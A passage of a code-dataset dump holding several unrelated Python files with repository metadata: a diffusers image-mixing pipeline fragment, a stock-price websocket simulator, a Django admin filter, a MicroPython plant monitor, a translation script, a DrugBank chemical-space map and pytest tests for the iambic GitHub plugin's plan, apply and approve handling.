do_classifier_free_guidance = True\n else:\n do_classifier_free_guidance = False\n\n # 3. 
Encode input prompt\n text_encoder_lora_scale = (\n cross_attention_kwargs.get(\"scale\", None)\n if cross_attention_kwargs is not None\n else None\n )\n prompt_embeds = self._encode_prompt(\n prompt,\n device,\n num_images_per_prompt,\n do_classifier_free_guidance,\n negative_prompt,\n prompt_embeds=prompt_embeds,\n negative_prompt_embeds=negative_prompt_embeds,\n lora_scale=text_encoder_lora_scale,\n )\n\n # 4. Preprocess image\n image = self.image_processor.preprocess(image)\n\n # 5. set timesteps\n self.scheduler.set_timesteps(num_inference_steps, device=device)\n timesteps, num_inference_steps = self.get_timesteps(\n num_inference_steps, k_max, device\n )\n latent_timestep = timesteps[:1].repeat(batch_size * num_images_per_prompt) # type: ignore\n mixing_step_till = num_inference_steps - int(num_inference_steps * k_min) # type: ignore\n\n # 6. Prepare latent variables\n latents, image_latents, init_noise = self.prepare_latents(\n image,\n latent_timestep,\n batch_size,\n num_images_per_prompt,\n prompt_embeds.dtype,\n device,\n generator,\n )\n\n # 7. Prepare extra step kwargs. TODO: Logic should ideally just be moved out of the pipeline\n extra_step_kwargs = self.prepare_extra_step_kwargs(generator, eta)\n\n # 8. Denoising loop\n num_warmup_steps = len(timesteps) - num_inference_steps * self.scheduler.order\n with self.progress_bar(total=num_inference_steps) as progress_bar:\n for i, t in enumerate(timesteps):\n if i < mixing_step_till and t != timesteps[0]:\n layout_latents = self.scheduler.add_noise(\n image_latents, init_noise, t\n )\n\n # Mix the layout latents and current latents based on mixing ratio\n combined_latents = (v * latents) + ((1 - v) * layout_latents)\n else:\n combined_latents = latents\n\n # expand the latents if we are doing classifier free guidance\n latent_model_input = (\n torch.cat([combined_latents] * 2)\n if do_classifier_free_guidance\n else combined_latents\n )\n latent_model_input = self.scheduler.scale_model_input(\n latent_model_input, t\n )\n\n # predict the noise residual\n noise_pred = self.unet(\n latent_model_input,\n t,\n encoder_hidden_states=prompt_embeds,\n cross_attention_kwargs=cross_attention_kwargs,\n return_dict=False,\n )[0]\n\n # perform guidance\n if do_classifier_free_guidance:\n noise_pred_uncond, noise_pred_text = noise_pred.chunk(2)\n noise_pred = noise_pred_uncond + guidance_scale * (\n noise_pred_text - noise_pred_uncond\n )\n\n # compute the previous noisy sample x_t -> x_t-1\n latents = self.scheduler.step(\n noise_pred, t, latents, **extra_step_kwargs, return_dict=False\n )[0]\n\n # call the callback, if provided\n if i == len(timesteps) - 1 or (\n (i + 1) > num_warmup_steps and (i + 1) % self.scheduler.order == 0\n ):\n progress_bar.update()\n if callback is not None and i % callback_steps == 0:\n callback(i, t, latents)\n\n if not output_type == \"latent\":\n image = self.vae.decode(\n latents / self.vae.config.scaling_factor, return_dict=False\n )[0]\n image, has_nsfw_concept = self.run_safety_checker(\n image, device, prompt_embeds.dtype\n )\n else:\n image = latents\n has_nsfw_concept = None\n\n if has_nsfw_concept is None:\n do_denormalize = [True] * image.shape[0]\n else:\n do_denormalize = [not has_nsfw for has_nsfw in has_nsfw_concept]\n\n image = self.image_processor.postprocess(\n image, output_type=output_type, do_denormalize=do_denormalize\n )\n\n # Offload last model to CPU\n if hasattr(self, \"final_offload_hook\") and self.final_offload_hook is not None:\n self.final_offload_hook.offload()\n\n if not 
return_dict:\n return (image, has_nsfw_concept)\n\n return StableDiffusionPipelineOutput(\n images=image, nsfw_content_detected=has_nsfw_concept\n )\n","repo_name":"nipunjindal/diffusers-magic-mix","sub_path":"magicmix/magic_mix_pipeline_img2img.py","file_name":"magic_mix_pipeline_img2img.py","file_ext":"py","file_size_in_byte":11182,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"20356864772","text":"import asyncio\nimport websockets\n\nimport random\nimport requests\n\n\nasync def send_price_update():\n URI = 'ws://localhost:8765'\n\n async with websockets.connect(uri=URI) as websocket:\n while True: \n sim_price = 25 + random.uniform(-5, 5)\n PUT_sim_price = f'{sim_price:.2f}'\n try:\n requests.put(\"http://127.0.0.1:5000/stock\", \n json= {\n \"ticker\": \"NMRT\",\n \"price\": float(PUT_sim_price)\n })\n print('Connected, The price for the stock \"NMRT\" has changed!')\n except Exception as e:\n print(f'Error making the put request! {e}')\n\n await websocket.send(f'-UPDATE- the price for the stock \"NMRT\" is now: {sim_price:.2f}')\n\n await asyncio.sleep(5)\n\nasyncio.get_event_loop().run_until_complete(send_price_update())","repo_name":"Abdo-Mos/Stock_Market_Sim_REST_GraphQL_WebSocket","sub_path":"price_sim.py","file_name":"price_sim.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40403831612","text":"from django.contrib import admin\nfrom django.db.models import Q\n\n\nclass IsEmptyMatchFilter(admin.SimpleListFilter):\n \"\"\"Empty Match Filter\"\"\"\n\n title = 'Есть совпадения'\n parameter_name = 'is_empty_match'\n\n def lookups(self, request, model_admin):\n \"\"\"Get lookups\"\"\"\n return (\n ('', '-'),\n ('yes', 'Да'),\n ('no', 'Нет'),\n )\n\n def queryset(self, request, queryset):\n \"\"\"Get queryset\"\"\"\n value = self.value()\n if value == 'yes':\n return queryset.filter(overclockerskz__isnull=False, shopkz__isnull=False)\n elif value == 'no':\n return queryset.filter(Q(overclockerskz__isnull=True) | Q(shopkz__isnull=True))\n return queryset\n","repo_name":"4heck/overclockers-price-monitoring","sub_path":"apps/match/admin/filters/is_empty_match.py","file_name":"is_empty_match.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"18694353311","text":"from PlantMonitor.helper_functions import get_colour, get_neopixel_number\nfrom PlantMonitor.pixels import update_neopixels\nfrom PlantMonitor.webpages import setup_tinyweb_soil_moisture\nfrom helper_functions.io import load_json_settings\nfrom helper_functions.soil_moisture import get_soil_moisture\nfrom helper_functions.temperature import get_temperature\nfrom helper_functions.wifi_connection import connect_wifi, setup_access_point, \\\n setup_tinyweb_wifi\nimport network\nimport uasyncio\nimport machine\nimport neopixel\n\n\nwifi_config_file = 'configs/wireless_network.json'\nplant_config_file = 'PlantMonitor/config.json'\nneopixel_number = 10\nconnect_wifi(2, wifi_config_file)\n\n\nimport tinyweb\n\n# Setup the neopixel strip\nnp = neopixel.NeoPixel(machine.Pin(5), neopixel_number)\n\n\n# setup own wifi network if not connected\nsta_if = network.WLAN(network.STA_IF)\nif not sta_if.isconnected():\n setup_access_point(wifi_config_file)\n\n# Setup the tinyweb app\nwebserver = tinyweb.server.webserver()\n# Add the update wifi settings to the 
app\nsetup_tinyweb_wifi(webserver, wifi_config_file)\n\n# Setup the webpages to update the config of the soil sensor\nsetup_tinyweb_soil_moisture(webserver, plant_config_file)\n\n\n# define the main loop of the application\nasync def my_app():\n while True:\n plant_config = load_json_settings(plant_config_file)\n adc_raw, soil_moisture_perc = get_soil_moisture(\n **plant_config['soil_moisture_calibration']) # get SMD\n number = get_neopixel_number(soil_moisture_perc, neopixel_number,\n **plant_config['soil_moisture'])\n if number > neopixel_number:\n colour = (200, 0, 200)\n number = neopixel_number\n else:\n temp = get_temperature()\n colour = get_colour(temp, **plant_config['temperature']) # calculate colour\n update_neopixels(neopixel_number, number, colour, np)\n await uasyncio.sleep(60)\n\nwebserver.loop.create_task(my_app())\n\nprint('loaded')\n\n# Run the app\nwebserver.run(host='0.0.0.0', port=80)\n","repo_name":"EchoDel/hardware_projects","sub_path":"PlantMonitor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21486680841","text":"import json, requests\n\nkey = json.loads(open('cfg.txt', 'r').read())['yandex']\ncfg = json.loads(open('answers.txt', 'r').read())\nlangs = ['en', 'it', 'fr', 'de', 'uk', 'pl']\nformat = 'https://translate.yandex.net/api/v1.5/tr.json/translate?key={key}&text={text}&lang={lang}&format=plain'\n\nwhile 1:\n try:\n name = input('name: ')\n val = input('value: ') + '\\n'\n while 1:\n inp = input()\n if inp.find('EOF') != -1:\n val += inp.replace('EOF','')\n break\n val += inp + '\\n'\n cfg[name] = {}\n cfg[name]['ru'] = val\n for lang in langs:\n print(f'rquesting {lang}:')\n answer = json.loads(requests.get(format.format(lang=lang,text=val,key=key)).text)['text'][0]\n cfg[name][lang] = answer\n print(answer)\n f = open('answers.txt', 'w')\n f.write(json.dumps(cfg))\n f.close()\n except:\n print('exit')\n break\n","repo_name":"Denver-sn/SecurePass-TG","sub_path":"add_new_answer.py","file_name":"add_new_answer.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"69943722482","text":"import numpy as np\nimport pandas as pd\nimport tmap as tm\nimport scipy.stats as ss\nfrom faerun import Faerun\nfrom rdkit.Chem import AllChem, Descriptors, Descriptors3D\nfrom mhfp.encoder import MHFPEncoder\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom lipinski import lipinski_pass\n\n\ndef main():\n \"\"\"The main function\"\"\"\n df = pd.read_csv(\"drugbank.csv\").dropna(subset=[\"SMILES\"]).reset_index(drop=True)\n enc = MHFPEncoder()\n lf = tm.LSHForest(2048, 128)\n\n fps = []\n labels = []\n groups = []\n tpsa = []\n logp = []\n mw = []\n h_acceptors = []\n h_donors = []\n ring_count = []\n is_lipinski = []\n has_coc = []\n has_sa = []\n has_tz = []\n\n substruct_coc = AllChem.MolFromSmiles(\"COC\")\n substruct_sa = AllChem.MolFromSmiles(\"NS(=O)=O\")\n substruct_tz = AllChem.MolFromSmiles(\"N1N=NN=C1\")\n\n total = len(df)\n for i, row in df.iterrows():\n if i % 1000 == 0 and i > 0:\n print(f\"{round(100 * (i / total))}% done ...\")\n\n smiles = row[6]\n mol = AllChem.MolFromSmiles(smiles)\n\n if mol and mol.GetNumAtoms() > 5 and smiles.count(\".\") < 2:\n fps.append(tm.VectorUint(enc.encode_mol(mol, min_radius=0)))\n labels.append(\n f'{smiles}__{row[0]}__{row[1]}'.replace(\n \"'\", \"\"\n )\n )\n 
groups.append(row[3].split(\";\")[0])\n tpsa.append(Descriptors.TPSA(mol))\n logp.append(Descriptors.MolLogP(mol))\n mw.append(Descriptors.MolWt(mol))\n h_acceptors.append(Descriptors.NumHAcceptors(mol))\n h_donors.append(Descriptors.NumHDonors(mol))\n ring_count.append(Descriptors.RingCount(mol))\n is_lipinski.append(lipinski_pass(mol))\n has_coc.append(mol.HasSubstructMatch(substruct_coc))\n has_sa.append(mol.HasSubstructMatch(substruct_sa))\n has_tz.append(mol.HasSubstructMatch(substruct_tz))\n\n # Create the labels and the integer encoded array for the groups,\n # as they're categorical\n labels_groups, groups = Faerun.create_categories(groups)\n tpsa_ranked = ss.rankdata(np.array(tpsa) / max(tpsa)) / len(tpsa)\n logp_ranked = ss.rankdata(np.array(logp) / max(logp)) / len(logp)\n mw_ranked = ss.rankdata(np.array(mw) / max(mw)) / len(mw)\n h_acceptors_ranked = ss.rankdata(np.array(h_acceptors) / max(h_acceptors)) / len(\n h_acceptors\n )\n h_donors_ranked = ss.rankdata(np.array(h_donors) / max(h_donors)) / len(h_donors)\n ring_count_ranked = ss.rankdata(np.array(ring_count) / max(ring_count)) / len(\n ring_count\n )\n\n lf.batch_add(fps)\n lf.index()\n cfg = tm.LayoutConfiguration()\n cfg.k = 100\n # cfg.sl_extra_scaling_steps = 1\n cfg.sl_repeats = 2\n cfg.mmm_repeats = 2\n cfg.node_size = 2\n x, y, s, t, _ = tm.layout_from_lsh_forest(lf, config=cfg)\n\n # Define a colormap highlighting approved vs non-approved\n custom_cmap = ListedColormap(\n [\"#2ecc71\", \"#9b59b6\", \"#ecf0f1\", \"#e74c3c\", \"#e67e22\", \"#f1c40f\", \"#95a5a6\"],\n name=\"custom\",\n )\n\n bin_cmap = ListedColormap([\"#e74c3c\", \"#2ecc71\"], name=\"bin_cmap\")\n\n f = Faerun(\n clear_color=\"#222222\",\n coords=False,\n view=\"front\",\n impress='made with tmap
    and faerun
    source',\n )\n\n f.add_scatter(\n \"Drugbank\",\n {\n \"x\": x,\n \"y\": y,\n \"c\": [\n groups,\n is_lipinski,\n has_coc,\n has_sa,\n has_tz,\n tpsa_ranked,\n logp_ranked,\n mw_ranked,\n h_acceptors_ranked,\n h_donors_ranked,\n ring_count_ranked,\n ],\n \"labels\": labels,\n },\n shader=\"smoothCircle\",\n colormap=[\n custom_cmap,\n bin_cmap,\n bin_cmap,\n bin_cmap,\n bin_cmap,\n \"viridis\",\n \"viridis\",\n \"viridis\",\n \"viridis\",\n \"viridis\",\n \"viridis\",\n ],\n point_scale=2.5,\n categorical=[True, True, True, True, True, False, False, False, False, False],\n has_legend=True,\n legend_labels=[\n labels_groups,\n [(0, \"No\"), (1, \"Yes\")],\n [(0, \"No\"), (1, \"Yes\")],\n [(0, \"No\"), (1, \"Yes\")],\n [(0, \"No\"), (1, \"Yes\")],\n ],\n selected_labels=[\"SMILES\", \"Drugbank ID\", \"Name\"],\n series_title=[\n \"Group\",\n \"Lipinski\",\n \"Ethers\",\n \"Sulfonamides\",\n \"Tetrazoles\",\n \"TPSA\",\n \"logP\",\n \"Mol Weight\",\n \"H Acceptors\",\n \"H Donors\",\n \"Ring Count\",\n ],\n max_legend_label=[\n None,\n None,\n None,\n None,\n None,\n str(round(max(tpsa))),\n str(round(max(logp))),\n str(round(max(mw))),\n str(round(max(h_acceptors))),\n str(round(max(h_donors))),\n str(round(max(ring_count))),\n ],\n min_legend_label=[\n None,\n None,\n None,\n None,\n None,\n str(round(min(tpsa))),\n str(round(min(logp))),\n str(round(min(mw))),\n str(round(min(h_acceptors))),\n str(round(min(h_donors))),\n str(round(min(ring_count))),\n ],\n title_index=2,\n legend_title=\"\",\n )\n\n f.add_tree(\"drugbanktree\", {\"from\": s, \"to\": t}, point_helper=\"Drugbank\")\n\n f.plot(\"drugbank\", template=\"smiles\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"reymond-group/tmap","sub_path":"examples/drugbank/drugbank.py","file_name":"drugbank.py","file_ext":"py","file_size_in_byte":6058,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"75"} +{"seq_id":"41025608898","text":"from __future__ import annotations\n\nimport json\nimport shutil\nimport tempfile\nfrom unittest import mock\nfrom unittest.mock import AsyncMock, MagicMock, PropertyMock, call, patch\n\nimport github\nimport pytest\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import ec\n\nfrom iambic.core.utils import jws_encode_with_past_time\nfrom iambic.plugins.v0_1_0.github.github import (\n BODY_MAX_LENGTH,\n MERGEABLE_STATE_BLOCKED,\n MERGEABLE_STATE_CLEAN,\n HandleIssueCommentReturnCode,\n _post_artifact_to_companion_repository,\n ensure_body_length_fits_github_spec,\n format_github_url,\n get_session_name,\n handle_issue_comment,\n handle_pull_request,\n maybe_merge,\n)\nfrom iambic.plugins.v0_1_0.github.iambic_plugin import GithubBotApprover\n\n\n@pytest.fixture\ndef mock_github_client():\n with patch(\"github.Github\", autospec=True) as mock_github:\n yield mock_github\n\n\n@pytest.fixture\ndef issue_comment_git_apply_context():\n return {\n \"server_url\": \"https://github.com\",\n \"run_id\": \"12345\",\n \"run_attempt\": \"1\",\n \"token\": \"fake-token\",\n \"sha\": \"fake-sha\",\n \"ref\": \"fake-branch\",\n \"repository\": \"example.com/iambic-templates\",\n \"event_name\": \"issue_comment\",\n \"event\": {\n \"comment\": {\n \"body\": \"iambic git-apply\",\n \"user\": {\n \"login\": \"fake-commenter\",\n },\n },\n \"issue\": {\n \"number\": 1,\n },\n \"repository\": {\n \"clone_url\": \"https://github.com/example-org/iambic-templates.git\",\n },\n },\n \"user\": {\n \"login\": 
\"faker-user\",\n },\n }\n\n\n@pytest.fixture\ndef issue_comment_git_plan_context():\n return {\n \"server_url\": \"https://github.com\",\n \"run_id\": \"12345\",\n \"run_attempt\": \"1\",\n \"token\": \"fake-token\",\n \"sha\": \"fake-sha\",\n \"ref\": \"fake-branch\",\n \"repository\": \"example.com/iambic-templates\",\n \"event_name\": \"issue_comment\",\n \"event\": {\n \"comment\": {\n \"body\": \"iambic git-plan\",\n \"user\": {\n \"login\": \"fake-commenter\",\n },\n },\n \"issue\": {\n \"number\": 1,\n },\n \"repository\": {\n \"clone_url\": \"https://github.com/example-org/iambic-templates.git\",\n },\n },\n }\n\n\n@pytest.fixture\ndef issue_comment_git_approve_context():\n return {\n \"server_url\": \"https://github.com\",\n \"run_id\": \"12345\",\n \"run_attempt\": \"1\",\n \"token\": \"fake-token\",\n \"sha\": \"fake-sha\",\n \"ref\": \"fake-branch\",\n \"repository\": \"example.com/iambic-templates\",\n \"event_name\": \"issue_comment\",\n \"event\": {\n \"comment\": {\n \"body\": \"iambic approve\",\n \"user\": {\n \"login\": \"fake-commenter\",\n },\n },\n \"issue\": {\n \"number\": 1,\n },\n \"repository\": {\n \"clone_url\": \"https://github.com/example-org/iambic-templates.git\",\n },\n },\n }\n\n\n@pytest.fixture\ndef mock_lambda_run_handler():\n with patch(\n \"iambic.plugins.v0_1_0.github.github.lambda_run_handler\", autospec=True\n ) as _mock_lambda_run_handler:\n with patch(\n \"iambic.plugins.v0_1_0.github.github.SHARED_CONTAINER_GITHUB_DIRECTORY\",\n \"/tmp\",\n ) as _:\n with tempfile.TemporaryDirectory() as tmpdirname:\n with patch(\"iambic.lambda.app.REPO_BASE_PATH\", tmpdirname):\n yield _mock_lambda_run_handler\n\n\n@pytest.fixture\ndef mock_resolve_config_template_path():\n async_mock = AsyncMock()\n with patch(\n \"iambic.plugins.v0_1_0.github.github.resolve_config_template_path\",\n side_effect=async_mock,\n ) as _mock_resolve_config_template_path:\n yield _mock_resolve_config_template_path\n\n\n@pytest.fixture\ndef mock_load_config():\n async_mock = AsyncMock()\n with patch(\n \"iambic.plugins.v0_1_0.github.github.load_config\", side_effect=async_mock\n ) as _load_config:\n async_mock.return_value.github.allowed_bot_approvers = [\n GithubBotApprover(login=\"fake-commenter\", es256_pub_key=\"\")\n ]\n yield _load_config\n\n\n@pytest.fixture\ndef mock_run_git_plan():\n with patch(\n \"iambic.plugins.v0_1_0.github.github.run_git_plan\", autospec=True\n ) as _mock_run_git_plan:\n with patch(\n \"iambic.plugins.v0_1_0.github.github.SHARED_CONTAINER_GITHUB_DIRECTORY\",\n \"/tmp\",\n ) as _:\n with tempfile.TemporaryDirectory() as tmpdirname:\n with patch(\"iambic.lambda.app.REPO_BASE_PATH\", tmpdirname):\n yield _mock_run_git_plan\n\n\n@pytest.fixture\ndef mock_run_git_apply():\n with patch(\n \"iambic.plugins.v0_1_0.github.github.run_git_apply\", autospec=True\n ) as _mock_run_git_plan:\n with patch(\n \"iambic.plugins.v0_1_0.github.github.SHARED_CONTAINER_GITHUB_DIRECTORY\",\n \"/tmp\",\n ) as _:\n with tempfile.TemporaryDirectory() as tmpdirname:\n with patch(\"iambic.lambda.app.REPO_BASE_PATH\", tmpdirname):\n yield _mock_run_git_plan\n\n\n@pytest.fixture\ndef mock_lint_git_changes():\n with patch(\n \"iambic.plugins.v0_1_0.github.github.lint_git_changes\", autospec=True\n ) as _mock_lint_git_changes:\n yield _mock_lint_git_changes\n\n\n@pytest.fixture\ndef mock_commits():\n with patch(\n \"iambic.plugins.v0_1_0.github.github.prepare_local_repo_for_new_commits\",\n autospec=True,\n ) as _mock_commits:\n yield _mock_commits\n\n\n@pytest.fixture\ndef 
mock_repository():\n with patch(\"iambic.core.git.Repo\", autospec=True) as _mock_repository:\n yield _mock_repository\n\n\ndef test_issue_comment_with_non_clean_mergeable_state(\n mock_github_client, issue_comment_git_apply_context, mock_lambda_run_handler\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_BLOCKED\n handle_issue_comment(mock_github_client, issue_comment_git_apply_context)\n assert mock_lambda_run_handler.called is False\n assert mock_pull_request.merge.called is False\n\n\ndef test_issue_comment_with_not_applicable_comment_body(\n mock_github_client, issue_comment_git_apply_context, mock_lambda_run_handler\n):\n issue_comment_git_apply_context[\"event\"][\"comment\"][\"body\"] = \"foo\"\n return_code = handle_issue_comment(\n mock_github_client, issue_comment_git_apply_context\n )\n assert return_code == HandleIssueCommentReturnCode.NO_MATCHING_BODY\n\n\ndef test_issue_comment_with_clean_mergeable_state(\n mock_github_client,\n issue_comment_git_apply_context,\n mock_run_git_apply,\n mock_repository,\n):\n mock_run_git_apply.return_value = []\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.head.sha = issue_comment_git_apply_context[\"sha\"]\n mock_repository.clone_from.return_value.head.commit.hexsha = (\n issue_comment_git_apply_context[\"sha\"]\n )\n handle_issue_comment(mock_github_client, issue_comment_git_apply_context)\n assert mock_run_git_apply.called\n assert mock_pull_request.merge.called\n\n\n# invariant: PR is only merged if and only if git-apply is successful\ndef test_issue_comment_with_clean_mergeable_state_and_lambda_handler_crashed(\n mock_github_client,\n issue_comment_git_apply_context,\n mock_run_git_apply,\n mock_repository,\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.head.sha = issue_comment_git_apply_context[\"sha\"]\n mock_repository.clone_from.return_value.head.commit.hexsha = (\n issue_comment_git_apply_context[\"sha\"]\n )\n mock_run_git_apply.side_effect = Exception(\"unexpected failure\")\n with pytest.raises(Exception):\n handle_issue_comment(mock_github_client, issue_comment_git_apply_context)\n assert mock_run_git_apply.called\n assert mock_pull_request.create_issue_comment.called\n assert \"Traceback\" in mock_pull_request.create_issue_comment.call_args[0][0]\n assert not mock_pull_request.merge.called\n\n\n# invariant: PR is only merged if and only if git-apply is successful\ndef test_plan_issue_comment_with_clean_mergeable_state_and_lambda_handler_crashed(\n mock_github_client,\n issue_comment_git_plan_context,\n mock_resolve_config_template_path,\n mock_load_config,\n mock_lint_git_changes,\n mock_run_git_plan,\n mock_repository,\n):\n assert mock_load_config\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.head.sha = issue_comment_git_plan_context[\"sha\"]\n mock_repository.clone_from.return_value.head.commit.hexsha = (\n issue_comment_git_plan_context[\"sha\"]\n )\n mock_run_git_plan.side_effect = Exception(\"unexpected failure\")\n with pytest.raises(Exception):\n handle_issue_comment(mock_github_client, issue_comment_git_plan_context)\n assert mock_resolve_config_template_path.called\n 
assert mock_lint_git_changes.called\n assert mock_run_git_plan.called\n assert mock_pull_request.create_issue_comment.called\n assert \"Traceback\" in mock_pull_request.create_issue_comment.call_args[0][0]\n assert not mock_pull_request.merge.called\n\n\ndef test_format_github_url():\n pr_url = \"https://github.com/example-org/iambic-templates.git\"\n fake_token = \"foobar\"\n expected_url = \"https://oauth2:foobar@github.com/example-org/iambic-templates.git\"\n url = format_github_url(pr_url, fake_token)\n assert url == expected_url\n\n\n@pytest.fixture\ndef pull_request_context():\n return {\n \"server_url\": \"https://github.com\",\n \"run_id\": \"12345\",\n \"run_attempt\": \"1\",\n \"token\": \"fake-token\",\n \"sha\": \"fake-sha\",\n \"repository\": \"example.com/iambic-templates\",\n \"event_name\": \"pull_request\",\n \"event\": {\n \"pull_request\": {\n \"number\": 1,\n },\n \"repository\": {\n \"clone_url\": \"https://github.com/example-org/iambic-templates.git\",\n },\n },\n \"iambic\": {\n \"GH_OVERRIDE_TOKEN\": \"fake_override_token\",\n },\n }\n\n\ndef test_pull_request_plan(\n mock_github_client, pull_request_context, mock_run_git_plan, mock_repository\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.head.sha = pull_request_context[\"sha\"]\n mock_repository.clone_from.return_value.head.commit.hexsha = pull_request_context[\n \"sha\"\n ]\n handle_pull_request(mock_github_client, pull_request_context)\n assert (\n mock_run_git_plan.called is False\n ) # because this flow only directly calls create_issue_comment on the pull request\n assert (\n not mock_pull_request.merge.called\n ) # because this flow only issue the comment\n\n\n@pytest.mark.parametrize(\n \"repo_name,pr_number,expected_result\",\n [\n (\n \"noqdev/iambic-templates-itest\",\n \"1\",\n \"org=noqdev,repo=iambic-templates-itest,pr=1\",\n ),\n (\"noqdev/a^b\", \"1\", \"org=noqdev,repo=ab,pr=1\"),\n ],\n)\ndef test_get_session_name(repo_name, pr_number, expected_result):\n session_name = get_session_name(repo_name, pr_number)\n assert session_name == expected_result\n\n\ndef test_issue_comment_with_git_plan(\n mock_github_client,\n issue_comment_git_plan_context,\n mock_resolve_config_template_path,\n mock_load_config,\n mock_lint_git_changes,\n mock_run_git_plan,\n mock_repository,\n):\n assert mock_load_config\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.head.sha = issue_comment_git_plan_context[\"sha\"]\n mock_repository.clone_from.return_value.head.commit.hexsha = (\n issue_comment_git_plan_context[\"sha\"]\n )\n handle_issue_comment(mock_github_client, issue_comment_git_plan_context)\n assert mock_resolve_config_template_path.called\n assert mock_lint_git_changes.called\n assert mock_run_git_plan.called\n assert not mock_pull_request.merge.called\n\n\ndef test_issue_comment_with_allowed_approver(\n mock_github_client,\n issue_comment_git_approve_context,\n mock_repository,\n mock_resolve_config_template_path,\n mock_load_config,\n mock_commits,\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n assert mock_repository\n assert mock_resolve_config_template_path\n assert mock_load_config\n assert mock_commits\n\n approver: GithubBotApprover = (\n mock_load_config.side_effect.return_value.github.allowed_bot_approvers[0]\n )\n\n # Generate a new ECDSA private key\n private_key = 
ec.generate_private_key(\n ec.SECP256R1()\n ) # This is equivalent to the ES256 algorithm\n public_key = private_key.public_key()\n\n # Convert keys to PEM format\n private_pem = private_key.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.PKCS8,\n encryption_algorithm=serialization.NoEncryption(),\n )\n assert private_pem\n public_pem = public_key.public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n assert public_pem\n\n approver.es256_pub_key = public_pem.decode(\"utf-8\")\n payload = {\n \"repo\": \"example.com/iambic-templates\",\n \"pr\": 1,\n \"signee\": [\n \"user1@example.org\",\n \"user2@example.org\",\n ],\n }\n algorithm = \"ES256\"\n valid_period_in_minutes = 15\n encoded_jwt = jws_encode_with_past_time(\n payload, private_pem, algorithm, valid_period_in_minutes\n )\n\n # message format for approve\n # iambic approve\\n\n # \\n\n # \n # remember last line cannot have any newline character, the signature metadata must be on the last line\n\n message = f\"\"\"iambic approve\n```json\n{json.dumps(payload)}\n```\n\"\"\"\n issue_comment_git_approve_context[\"event\"][\"comment\"][\"body\"] = message\n\n handle_issue_comment(mock_github_client, issue_comment_git_approve_context)\n assert mock_pull_request.create_review.called is True\n\n\ndef test_issue_comment_with_not_allowed_approver(\n mock_github_client,\n issue_comment_git_approve_context,\n mock_repository,\n mock_resolve_config_template_path,\n mock_load_config,\n mock_commits,\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n assert mock_commits\n assert mock_repository\n assert mock_resolve_config_template_path\n assert mock_load_config\n mock_load_config.side_effect.return_value.github.allowed_bot_approvers = []\n handle_issue_comment(mock_github_client, issue_comment_git_approve_context)\n assert mock_pull_request.create_review.called is False\n\n\n# verify if there are changes during git_apply. 
those changes are push\n# back into the PR\ndef test_issue_comment_with_clean_mergeable_state_with_additional_commits(\n mock_github_client,\n issue_comment_git_apply_context,\n mock_run_git_apply,\n mock_repository,\n):\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.head.sha = issue_comment_git_apply_context[\"sha\"]\n mock_pull_request.head.ref = issue_comment_git_apply_context[\"ref\"]\n pre_sha = \"pre_sha\"\n post_sha = \"post_sha\"\n\n # we are mocking how the sha has changed in the local checkout repo\n type(mock_repository.clone_from.return_value.head.commit).hexsha = PropertyMock(\n side_effect=[\n pre_sha,\n post_sha,\n ]\n )\n\n handle_issue_comment(mock_github_client, issue_comment_git_apply_context)\n assert mock_run_git_apply.called\n\n # verify we did push back the changes to remote\n pull_request_branch_name = mock_pull_request.head.ref\n refspec = f\"HEAD:{pull_request_branch_name}\"\n mock_repository.clone_from.return_value.remotes.origin.push.assert_called_with(\n refspec=refspec\n )\n\n # verify we are merging with the latest local repo sha\n mock_pull_request.merge.assert_called_with(sha=post_sha, merge_method=\"merge\")\n\n\ndef test_run_handler():\n from iambic.plugins.v0_1_0.github.github import run_handler\n\n mock_Github = MagicMock(name=\"Github\")\n with mock.patch(\n \"iambic.plugins.v0_1_0.github.github.github.Github\", new=mock_Github\n ):\n # mg.generate_uut_mocks_with_asserts(run_handler)\n arg = {\n \"token\": \"fake-token\",\n \"event_name\": \"pull_request\",\n \"iambic\": {\"GH_OVERRIDE_TOKEN\": \"GH_OVERRIDE_TOKEN\"},\n \"repository\": \"exampleorg/iambic-templates\",\n \"event\": {\"pull_request\": {\"number\": 4}},\n }\n run_handler(arg)\n assert 2 == mock_Github.call_count\n mock_Github.assert_has_calls(\n calls=[\n call(\"fake-token\"),\n call(\"GH_OVERRIDE_TOKEN\"),\n ]\n )\n mock_Github.return_value.get_repo.assert_called_once_with(\n \"exampleorg/iambic-templates\"\n )\n 